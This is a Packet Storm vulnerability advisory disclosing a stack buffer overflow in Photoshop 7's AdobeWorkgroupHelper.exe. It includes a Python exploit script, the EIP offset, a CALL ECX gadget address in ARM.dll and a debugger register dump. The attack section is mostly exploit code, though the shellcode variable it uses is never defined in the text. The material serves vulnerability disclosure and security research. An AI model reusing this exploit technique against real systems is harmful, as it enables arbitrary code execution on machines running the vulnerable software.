AdobeWorkgroupHelper.exe Buffer Overflow

Type packetstorm
Reporter hyp3rlinx
Modified 2015-10-12T00:00:00


                                            `[+] Credits: hyp3rlinx  
[+] Website:  
[+] Source:  
AdobeWorkgroupHelper.exe v2.8.3.3  
Part of Photoshop 7.0 circa 2002  
Vulnerability Type:  
Stack Based Buffer Overflow  
CVE Reference:  
Vulnerability Details:  
AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup  
functionality, that lets users work with files on a server that is  
registered as a workgroup.  
If AdobeWorkgroupHelper.exe is called with an overly long command line  
argument it is vulnerable to a stack based buffer overflow exploit.  
Resluting in arbitrary code execution undermining the integrity of the  
program. We can control EIP register at about 5,856 bytes, our shellcode  
will point  
to ECX register.  
Tested successfully on Windows 7 SP1  
Exploit code(s):  
Use below python script to exploit...  
import struct,os,subprocess  
#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit  
#Tested Windows 7 SP1  
#by hyp3rlinx -  
#0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll]  
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3  
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)  
Quick Register dump...  
EAX 00270938  
ECX 00270A7C <---------------BOOM!  
EBX 41414140  
ESP 0018FEB0  
EBP 0018FED0  
ESI 00000000  
EDI 41414141  
EIP 004585C8 AdobeWor.004585C8  
C 0 ES 002B 32bit 0(FFFFFFFF)  
P 0 CS 0023 32bit 0(FFFFFFFF)  
A 0 SS 002B 32bit 0(FFFFFFFF)  
Z 0 DS 002B 32bit 0(FFFFFFFF)  
S 0 FS 0053 32bit 7EFDD000(FFF)  
T 0 GS 002B 32bit 0(FFFFFFFF)  
D 0  
O 0 LastErr ERROR_SUCCESS (00000000)  
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)  
#shellcode to pop calc.exe Windows 7 SP1  
vulnpgm="C:\Program Files (x86)\Common  
Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "  
#payload="A"*5852+"R"*4 #<---- control EIP register  
#our shellcode will point at ECX register, so we need to find an JMP or  
CALL ECX and point EIP to that address  
#where our malicious code resides, we find it in ARM.dll  
eip=struct.pack('<L', 0x618B19F7) #CALL ECX ARM.dll v2.8.3.3  
payload="A"*5852+eip+"\x90"*20+sc #<----- direct EIP overwrite BOOOOOM!!!  
subprocess.Popen([vulnpgm, payload], shell=False)  
Disclosure Timeline:  
Vendor Notification: August 31, 2015  
October 12, 2015 : Public Disclosure  
Exploitation Technique:  
Severity Level:  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author.  
The author is not responsible for any misuse of the information contained  
herein and prohibits any malicious use of all security related information  
or exploits by the author or elsewhere.  
by hyp3rlinx